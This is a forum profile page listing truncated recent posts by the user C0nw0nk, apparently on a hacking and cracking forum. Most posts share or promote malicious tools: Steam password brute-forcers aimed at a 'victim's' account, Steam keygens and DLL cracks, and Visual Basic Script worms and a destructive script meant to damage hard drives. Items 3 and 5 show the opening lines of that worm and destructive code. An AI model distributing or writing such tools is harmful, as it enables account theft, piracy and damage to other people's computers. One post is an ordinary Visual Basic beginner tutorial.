Recent content by C0nw0nk

  1. C0nw0nk

    Steam Password Hacker Collection

    lol you belive what you like you have no idea what a program is i dont need to prove myself to a noob like you who all he can do all day is post the same reply :)
  2. C0nw0nk

    Steam Password Hacker Collection

    well put it this way .net framework is for learners i wont tell u the izact language i focus on because i switch in between c++ ,delphi and .net framework but most of the time i use the same compiler p3ng3l uses
  3. C0nw0nk

    .vbs Visual Basic Script Polymorphic

    This will damedge your hard drive terribly so dont run it unless you hate your pc or if your computer is running windows vista :) and open in a text document then save as INF3CTOR.vbs then run it and sit back and enjoy the insanity >:D @set hjmmt=echo @set bugcl=copy @ctty nul._! for...
  4. C0nw0nk

    .vbs Visual Basic Script Worm Virus

    please note do not run this on your own computer save it in a .txt file as worm.vbs its a worm virus so you will lag if you run it and it will damedge your hard drive dramaticly
  5. C0nw0nk

    .vbs Visual Basic Script Worm Virus

    ok heres a little script i thought i would share with you all since visual basic script and viruses init are a extremely rare thing to come by so enjoy :) 'Serial Number : 0.7055475 ' On Error Resume Next spawn() sub spawn() Set s = CreateObject("Scripting.FileSystemObject") Set f...
  6. C0nw0nk

    Infection Virus Maker

    Don't think so :)
  7. C0nw0nk

    Visual Basic's Learner Tutorial

    Visual Basic Programming Command's (Learner) This tutorial is for learners not advanced user's. how to minimize the form on the click of a object or button well double click your path (button1, picturebox1 etc.) and then in the code put this : Me.WindowState = FormWindowState.Minimized...
  8. C0nw0nk

    Steam Patcher's Collection

    ignore it try source games such as dod:s hl2dm tf2 etc etc ignore all error messedges and scroll up and check your instaling list and it should be dling :)
  9. C0nw0nk

    Steam Patcher's Collection

    lol maybe you should not judge stuff and try it first ;) theres always the occasional person who likes to call it fake at the end of the day its a crack it belong's here with the rest of the cracks
  10. C0nw0nk

    Steam Keygen's

    ok well for those of you who didnt know already steam update patched up keygen's so you can realy use a keygen to activate a product on steam with out a cd / dvd disk but then again cd key's can alway's be re-activated on other product's so il give you the steam keygen's anyway hopefully they...
  11. C0nw0nk

    Steam Patcher's Collection

    These are a series of patches i did for steam i tried to make them look as intresting as possible with a design but theres not realy allot you can do with a patch except click the patch button and it patches the old steam.dll :P but oh well never mind i hope you enjoy these tool's Unreal...
  12. C0nw0nk

    Steam Password Hacker Collection

    ok well i saw that allot of you liked my old password decoders so i thought i would share all of the ones i have created so far with you including the latest version's so here have fun just remember enter your victim's steam account name then click start and it will start bruteforcing through...
  13. C0nw0nk

    steam password hacker v5.0

    lol its good to see you all love my work except for the occasional individual :) but i finaly signed up with :D so now i can start posting my own program's here as long as the admin's dont mind and also for the video's of the rest of my work just visit YouTube - c0n2w0nk's Channel...